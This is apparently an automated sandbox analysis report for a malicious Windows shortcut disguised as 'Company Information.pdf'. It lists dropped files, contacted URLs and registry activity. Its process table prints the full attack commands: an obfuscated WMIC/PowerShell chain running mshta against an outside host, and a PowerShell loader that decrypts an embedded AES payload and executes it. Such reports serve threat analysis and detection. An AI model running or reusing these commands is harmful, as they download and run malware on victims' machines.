Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Company Information.pdf.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31
23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x3f1c3e14, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\51c7e5a3-be1a-4ec9-86d1-23255d704aa0.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 15
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7800
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7800
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI24ac3.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oy4r1kd.rkt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fm22fcu.zt1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akkit1s2.50b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehwgi4af.gf0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldlobcbu.k0f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1itqhj1.rqd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-21 09-02-26-492.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\0084b12a-f93a-4230-8dc1-cb97a34444e7.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\548c7d99-096f-460d-9e27-268b8f48c62d.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\bfad6a40-d454-41ea-b56c-d6da93baed75.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\cb31477f-9588-4ea4-a338-b1fcae85353d.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
There are 53 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wbem\WMIC.exe
|
"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy"
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function
slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key
= slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI,
0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6)
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Company%20Information.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072
--field-trial-handle=1632,i,8924348424998603111,1472651231245684160,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://evanbconsultancy.com/Sand/Buddy
|
84.32.84.121
|
|
|
|
https://evanbconsultancy.com
|
unknown
|
|
|
|
https://evanbconsultancy.co
|
unknown
|
|
|
|
https://evanbconsultancy.com/
|
unknown
|
|
|
|
https://evanbconsultancy.c
|
unknown
|
|
|
|
https://evanbconsultancy.com/Light
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddyft
|
unknown
|
||
|
https://evanbconsultancy.com/Ligh
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Comp
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTYTR.m
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyVBE;.JS;.JSE;.
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddy$global:?
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddy$
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Information.pdfp
|
unknown
|
||
|
https://gmpg.org/xfn/11
|
unknown
|
||
|
http://evanbconsultancy.com
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyLMEMP
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddy...P&
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyC:
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20In
|
unknown
|
||
|
https://evanbconsultancy.com/Fue
|
unknown
|
||
|
https://evanbconsultancy.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.8.7
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyRRC:
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Inform
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Information.pdf
|
84.32.84.121
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Informati
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Information.p
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Info
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%2
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Information.pd
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Information.
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddy...
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Informat
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTY
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Inf
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMT
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Co
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Com
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddyh
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Compan
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/Buddyhttps://evanbconsultancy.com/Sand/Buddy
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/C
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://evanbconsultancy.com/Fu
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Compa
|
unknown
|
||
|
https://api.w.org/
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://evanbconsultancy.com/L
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTYTR.ms
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTYTR.msi
|
84.32.84.121
|
||
|
https://evanbconsultancy.com/Sand/Buddyp
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyqSV
|
unknown
|
||
|
https://evanbconsultancy.com/Light/
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGC
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://evanbconsultancy.com/F
|
unknown
|
||
|
https://evanbconsultancy.com/Lig
|
unknown
|
||
|
https://evanbconsultancy.com/Light/O
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Infor
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyH
|
unknown
|
||
|
https://evanbconsultancy.com/Li
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTYTR.
|
unknown
|
||
|
https://www.adobe.co
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCM
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTYT
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Information
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OG
|
unknown
|
||
|
https://evanbconsultancy.com/feed/
|
unknown
|
||
|
https://evanbconsultancy.com/wp-json/
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Informatio
|
unknown
|
||
|
http://crl.microsoftb
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyX
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyV
|
unknown
|
||
|
https://evanbconsultancy.com/.
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20Informa
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company%20I
|
unknown
|
||
|
https://evanbconsultancy.com/Light/OGCMTYTR
|
unknown
|
||
|
https://evanbconsultancy.com/Fuel/Company
|
unknown
|
||
|
https://evanbconsultancy.com/comments/feed/
|
unknown
|
||
|
https://evanbconsultancy.com/Sand/BuddyinC:
|
unknown
|
There are 86 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
evanbconsultancy.com
|
84.32.84.121
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
x1.i.lencr.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
84.32.84.121
|
evanbconsultancy.com
|
Lithuania
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE409000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
21475FE000
|
unkown
|
page readonly
|
||
|
25E56730000
|
heap
|
page readonly
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6FD870000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
214717E000
|
stack
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA290000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAAB430000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202B9744000
|
heap
|
page read and write
|
||
|
202BA41E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1F6F849D000
|
heap
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
202BE840000
|
trusted library allocation
|
page read and write
|
||
|
202BA444000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA44A000
|
heap
|
page read and write
|
||
|
1F6FD9D0000
|
trusted library allocation
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8CF000
|
heap
|
page read and write
|
||
|
29D2C8D4000
|
heap
|
page read and write
|
||
|
1FAB7895000
|
heap
|
page read and write
|
||
|
2147C7E000
|
unkown
|
page readonly
|
||
|
29D2C8E7000
|
heap
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
25E586AB000
|
trusted library allocation
|
page read and write
|
||
|
25E58655000
|
trusted library allocation
|
page read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
202BE7E0000
|
trusted library allocation
|
page read and write
|
||
|
202BE998000
|
trusted library allocation
|
page read and write
|
||
|
1F6FDAF4000
|
heap
|
page read and write
|
||
|
202BE386000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
7FFAAB300000
|
trusted library allocation
|
page read and write
|
||
|
202BE3D9000
|
heap
|
page read and write
|
||
|
7FFAACA0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
29D2C8A1000
|
heap
|
page read and write
|
||
|
B2DA8FD000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
7FFAAB400000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
25E7058B000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1BBD296E000
|
heap
|
page read and write
|
||
|
29D2C89F000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE746000
|
trusted library allocation
|
page read and write
|
||
|
202B96C0000
|
trusted library allocation
|
page read and write
|
||
|
1BBD2BEE000
|
heap
|
page read and write
|
||
|
202BE9D6000
|
trusted library allocation
|
page read and write
|
||
|
1F6FDAF2000
|
heap
|
page read and write
|
||
|
7FFAAB2C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
55C90F8000
|
stack
|
page read and write
|
||
|
202BE74A000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA436000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1F6F8C15000
|
heap
|
page read and write
|
||
|
